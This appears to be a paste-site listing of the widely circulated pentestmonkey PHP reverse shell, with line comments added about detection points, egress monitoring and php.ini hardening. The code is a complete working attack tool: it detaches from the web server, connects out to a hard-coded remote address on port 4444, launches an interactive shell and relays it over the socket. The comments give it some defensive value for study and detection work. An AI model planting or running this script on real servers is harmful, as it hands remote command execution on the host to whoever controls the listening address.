crinob

php-reverse-shell

Feb 9th, 2023
PHP 2.64 KB | Cybersecurity | 0 0
  1. <?php
  2. // php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
  3. // Copyright (C) 2007 [email protected]
  4.  
  5. set_time_limit (0);  // Script settings follow; this call first removes PHP's execution time limit for the request
  6. $VERSION = "1.0";  // assigned but never read in this listing
  7. $ip = '190.89.10.23';  // hard-coded remote address handed to fsockopen() below; a network indicator for this sample
  8. $port = 4444;  // hard-coded remote TCP port used together with $ip
  9. $chunk_size = 1400;  // upper bound, in bytes, for each fread() in the relay loop
  10. $write_a = null;  // write set passed to stream_select(); no stream is watched for writability
  11. $error_a = null;  // exceptional-condition set passed to stream_select(); none is watched
  12. $shell = 'uname -a; w; id; sh -i';  // command line handed to proc_open(); an interactive "sh -i" child of a PHP process is a host-side detection point
  13. $daemon = 0;  // set to 1 further down once fork + setsid have succeeded
  14. $debug = 0;  // when non-zero, the relay loop passes the relayed data to printit()
  15.  
  16. if (function_exists('pcntl_fork')) {  // Detach from the launching process, but only when the pcntl extension is loaded
  17.     $pid = pcntl_fork();
  18.    
  19.     if ($pid == -1) {  // -1 is pcntl_fork()'s failure value
  20.         printit("ERROR: Can't fork");
  21.         exit(1);
  22.     }
  23.    
  24.     if ($pid) {  // non-zero return value: this is the parent
  25.         exit(0);  // Parent exits
  26.     }
  27.     if (posix_setsid() == -1) {  // child asks to lead a new session; -1 signals failure
  28.         printit("Error: Can't setsid()");
  29.         exit(1);
  30.     }
  31.  
  32.     $daemon = 1;
  33. } else {  // no pcntl: continue inside the original process
  34.     printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
  35. }
  36.  
  37. chdir("/");  // working directory moved to the filesystem root
  38.  
  39. umask(0);  // clears the file-mode creation mask for this process
  40.  
  41. // Open an outbound TCP connection to $ip:$port (30-second connect timeout), then start the command in $shell with its three standard streams on pipes
  42. $sock = fsockopen($ip, $port, $errno, $errstr, 30);  // NOTE(review): an outbound connection initiated by a web-server PHP worker is what egress filtering and network monitoring would see here
  43. if (!$sock) {
  44.     printit("$errstr ($errno)");
  45.     exit(1);
  46. }
  47.  
  48. $descriptorspec = array(
  49.    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
  50.    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
  51.    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
  52. );
  53.  
  54. $process = proc_open($shell, $descriptorspec, $pipes);  // fills $pipes[0..2] with the parent's ends; NOTE(review): hosts that do not need proc_open, fsockopen or pcntl_fork can list them in php.ini's disable_functions
  55.  
  56. if (!is_resource($process)) {
  57.     printit("ERROR: Can't spawn shell");
  58.     exit(1);
  59. }
  60.  // All four streams are switched to non-blocking mode before the relay loop starts
  61. stream_set_blocking($pipes[0], 0);
  62. stream_set_blocking($pipes[1], 0);
  63. stream_set_blocking($pipes[2], 0);
  64. stream_set_blocking($sock, 0);
  65.  
  66. printit("Successfully opened reverse shell to $ip:$port");
  67.  
  68. while (1) {  // Relay loop: copies bytes between the socket and the child's pipes until either side reports end-of-file
  69.     if (feof($sock)) {  // remote end closed the connection
  70.         printit("ERROR: Shell connection terminated");
  71.         break;
  72.     }
  73.  
  74.     if (feof($pipes[1])) {  // child's stdout is at end-of-file
  75.         printit("ERROR: Shell process terminated");
  76.         break;
  77.     }
  78.  
  79.     $read_a = array($sock, $pipes[1], $pipes[2]);  // rebuilt every pass because stream_select() modifies the array it is given
  80.     $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);  // null timeout: waits with no time limit; the return value is stored but never checked
  81.  
  82.     if (in_array($sock, $read_a)) {  // socket -> child's stdin
  83.         if ($debug) printit("SOCK READ");
  84.         $input = fread($sock, $chunk_size);
  85.         if ($debug) printit("SOCK: $input");
  86.         fwrite($pipes[0], $input);  // fread()/fwrite() results are not checked for failure or short writes
  87.     }
  88.  
  89.     if (in_array($pipes[1], $read_a)) {  // child's stdout -> socket
  90.         if ($debug) printit("STDOUT READ");
  91.         $input = fread($pipes[1], $chunk_size);
  92.         if ($debug) printit("STDOUT: $input");
  93.         fwrite($sock, $input);
  94.     }
  95.  
  96.     if (in_array($pipes[2], $read_a)) {  // child's stderr -> socket
  97.         if ($debug) printit("STDERR READ");
  98.         $input = fread($pipes[2], $chunk_size);
  99.         if ($debug) printit("STDERR: $input");
  100.         fwrite($sock, $input);
  101.     }
  102. }
  103.  // Teardown: close the socket and the three pipes, then the process handle
  104. fclose($sock);
  105. fclose($pipes[0]);
  106. fclose($pipes[1]);
  107. fclose($pipes[2]);
  108. proc_close($process);
  109.  
  110. function printit ($string) {  // Status/diagnostic output helper: prints $string followed by a newline
  111.     if (!$daemon) {  // no `global $daemon` is visible, so this reads an unset function-local variable; as written the branch is taken on every call, whatever the top-level $daemon holds
  112.         print "$string\n";  // the literal status strings passed in by the callers therefore always reach the script's output, which makes them usable as content signatures
  113.     }
  114. }
  115.  
  116. ?>